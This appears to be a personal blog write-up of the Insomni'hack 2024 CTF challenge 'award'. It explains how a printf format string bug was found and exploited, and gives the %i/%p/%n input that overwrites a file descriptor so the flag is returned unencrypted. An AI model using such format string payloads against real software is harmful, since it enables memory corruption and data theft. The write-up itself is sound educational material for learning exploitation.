Insomni'hack 2024 - Award Challenge
As I haven't posted for a long time and now participated in the Insomni'hack 2024 CTF, I thought I write about the challenge "award", which I thought was quite interesting. After solving another easy challenge, I spent pretty much the entire night of the CTF on it, but only finished the next day, when the CTF was already over.
Given was a binary. If you want to follow-along, you can find the binary here (encoded as base64 with added line breaks). Additionally, there was given an nc command to run that remote, so the binary was only for analysis of what runs on the remote side.
So the analysis and decompilation of the binary could be easily done in any of the usual tools. I used Binary Ninja, as I have a license for it and it's not that expensive. I spent quite some time in setting the right variable names etc.
The decompiled code looks like this:
Decompiled Code |
Note: There were also stack cookies in the main function added by the compiler, but that code has been removed in the above screenshot, as it is not really relevant for now.
So what does the code do? It sets the mode "line buffering" on the standard streams, initializes buffers and then asks for user input. Then it opens the file "flag.txt", which has to be located in the same folder, reads random bytes from /dev/urandom and outputs the same user name again, loads the flag and encodes it with the random data and outputs that again.
If this is to be exploited remotely, then the only way is to find a vulnerability. The buffer for reading-in the username is using fgets with a correct length value of 32, so there is no buffer overflow. Additionally, the binary uses ASLR, stack cookies and all that fun stuff to prevent or complicate exploitation.
But after some closer looks at the code, it seems that the input text is simply output again in line 28 using a printf command. That is a format string vulnerability. I've spent tons of time trying to understand the stack layout, looking up gdb commands, setting breakpoints in stripped code and reading the stack memory. My idea was to read the random data using the format string vulnerability and that way be able to decrypt the returned string.
Breakpoint on vulnerable printf in gdb |
The stack layout for the variables is as follows:
Stack layout |
So we want to see some variables by inserting some format string. What took me quite some time is that on Linux the first six parameters are passed not on the stack, but in registers. Only if there are more than six parameters, these are passed on the stack. This is the "System V AMD ABI" calling convention. So with the format string being the first parameter, we need to waste five parameters, before we get anything from the stack. Also, %x or %08x or %016x or whatever else does not return the full qword from the stack, but only the first dword. The only thing that works is %p, which returns the full qword, with bytes reversed (as x86 is little endian).
data read from stack |
In the screenshot of gdb above, we can see the input name %i%i%i%i%i to waste five parameters and then a separator ':' and then we output the stack content with several %p. We can confirm the content by looking at the stack in gdb.
stack dump in gdp |
So we can confirm that we can successfully read the stack, only the format in the output is a bit different, but the data can be fully read, up to the length of the limited input string (max. 31 characters plus terminating null byte). In the output string the %p values are separated by 0x and note that the '0' belongs to the separator and not to the number. Also, the bytes are reversed due to little endianness and in the dump separated by dword, so the individual dwords are reversed, different than the qword. For example, the first output of %p is 0x4656d6f68 (not ...6f680!) and this corresponds to the two dword values 0x656d6f68 and 0x00000004. The '4' is the value in fd_rnd by the way.
This is also the point we realize that at the time of the printf statement, there is no useful data on the stack yet. Neither the flag nor the random bytes have been read yet. So new ideas are needed.
As we cannot read anything, the only solution must be to write data.
Going through the original format string vulnerability document from 2001 again, we can see that probably the only way to write useful data is to use the %n option.
what is %n |
In the screenshot from above (from the website educative.io), we can see how this works: It returns the number of written bytes into the given variable. So there must be some pointer on the stack that points to the variable we can overwrite. Looking at the stack dump from above, we can see that in the second line on the right side there is some pointer. Looking it up in the stack layout diagram, this is the ptr_fd_rnd pointer. This means we can overwrite the fd_rnd file descriptor.
So what can we do when we overwrite the file descriptor for the random data generator? We could overwrite it with another file descriptor, for example with stdin, but that gets a bit tricky, as we cannot easily control the value written and would need multiple writes. But we can certainly overwrite it with an invalid file descriptor.
Looking at the decompiled code again, we can see the following:
- Line 27 creates this pointer on the stack, which was conveniently placed there for us, as we can use that for exploitation. The pointer is not used otherwise.
- Line 29 reads data from the /dev/urandom device. The return value is stored, but never used or checked.
This means that if we overwrite the fd_rnd file descriptor with a random value, we would cause the read function to fail, leaving the buf_rnd with all zeroes and therefore causing the xor to not do anything, causing the output to be clear-text instead of the xor encrypted flag.
So the input string would be again %i%i%i%i%i to skip the register-based parameters, then three times %p to skip to the ptr_fd_rnd pointer on the stack and then a %n to write to the variable fd_rnd (with ptr_fd_rnd on the stack).
exploitation |
We can see in this screenshot the stack before and after the exploitation. The fd_rnd file descriptor is the second value, which changes from 0x4 to 0x38 (the number of bytes in our format string output). The value 0x38 is not a valid file descriptor. So let's see if this worked.
result of exploitation |
So this successfully returns the unencrypted flag content. Now this should only be submitted to the remote server, but that is not available anymore after the CTF is over.
Lessons learned:
- I've known format string vulnerabilities from a theoretical standpoint, but this is the first time actually exploiting one and also using not only the read functionality, but also writing.
- On Linux the first six parameters are passed by register, so this has to be taken into account for anything stack related.
- Reading 64-bit values on a 64-bit system can only be done with %p, as %08x won't work.
- Writing to a destination address requires a pointer, which was conveniently placed onto the stack by the challenge creators. As this value was unused, this can be treated as a given hint.
- The stack is read upward (towards higher addresses), starting at the current stack pointer address. As the stack grows towards lower addresses when pushing something to the stack, I thought the first parameter would be at higher addresses. Somehow I also thought that the parameters must be below the current stack pointer, but of course that makes no sense.
- The calling convention that the caller cleans up the stack is quite convenient to exploit this vulnerability, otherwise it would mess up the stack.
Even though I ran into many dead-ends and spent way too much time on this, at least I could solve it on my own at the end and learned a lot. It was a fun challenge and helped me better understand format string vulnerabilities.
Comments
Post a Comment